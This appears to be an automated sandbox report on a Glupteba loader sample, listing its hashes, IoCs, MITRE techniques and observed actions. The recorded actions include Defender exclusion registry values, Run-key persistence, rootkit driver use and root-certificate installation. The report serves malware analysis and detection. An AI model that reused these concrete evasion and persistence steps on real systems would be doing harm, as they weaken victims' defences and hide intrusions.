glupteba | 15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35

Analysis

max time kernel
144s
max time network
150s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
01/06/2023, 15:00 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06260399.exe
Size

4.1MB
MD5

f5044df58ed68f39007184ad674f22c6
SHA1

0dedbe5e10878f737990cae5c407d67df98680f6
SHA256

15ae92083fbe3db9776c6c09f9be86d0ea626bced37b10d2dae583ebcc3a1e35
SHA512

bd1bb50865d5091293dd0c3f7b9876bb737d57ac9840a84a17e5fc00ac7661c26d09fa2600ff6e4e935334207d0e2f85b43764e268c930a6b6a4ef6de7e2141a
SSDEEP

98304:qViZztAoIO3/53yjAPrhdVZlcI3OG+l3ERm+TnqOJ5hp:RBvijGddVoI3OG4WJTnzJ5hp

Score

10^/10

glupteba discovery dropper evasion loader persistence rootkit trojan

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

resource	yara_rule
behavioral1/memory/2016-55-0x0000000002C10000-0x00000000034FB000-memory.dmp	family_glupteba
behavioral1/memory/2016-56-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1372-66-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-68-0x0000000002D70000-0x000000000365B000-memory.dmp	family_glupteba
behavioral1/memory/600-75-0x0000000140000000-0x00000001405E8000-memory.dmp	family_glupteba
behavioral1/memory/1548-95-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-122-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-155-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-195-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-231-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-240-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-249-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-263-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/1548-272-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\06260399.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	06260399.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
1388	bcdedit.exe
1752	bcdedit.exe
1020	bcdedit.exe
808	bcdedit.exe
1508	bcdedit.exe
1488	bcdedit.exe
1616	bcdedit.exe
1032	bcdedit.exe
1264	bcdedit.exe
1960	bcdedit.exe
1948	bcdedit.exe
1928	bcdedit.exe
1860	bcdedit.exe
1004	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
764	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Executes dropped EXE 5 IoCs

pid	Process
1548	csrss.exe
600	patch.exe
1200	injector.exe
1484	dsefix.exe
1768	tor.exe

Loads dropped DLL 20 IoCs

pid	Process
1372	06260399.exe
1372	06260399.exe
860	Process not Found
600	patch.exe
600	patch.exe
600	patch.exe
600	patch.exe
600	patch.exe
1548	csrss.exe
600	patch.exe
600	patch.exe
600	patch.exe
1548	csrss.exe
1768	tor.exe
1768	tor.exe
1768	tor.exe
1768	tor.exe
1768	tor.exe
1768	tor.exe
1768	tor.exe

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	06260399.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\06260399.exe = "0"	06260399.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	06260399.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	06260399.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	06260399.exe
File created	C:\Windows\rss\csrss.exe	06260399.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20230601150011.cab	makecab.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1396	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1344	schtasks.exe
1752	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	06260399.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	06260399.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	06260399.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	06260399.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
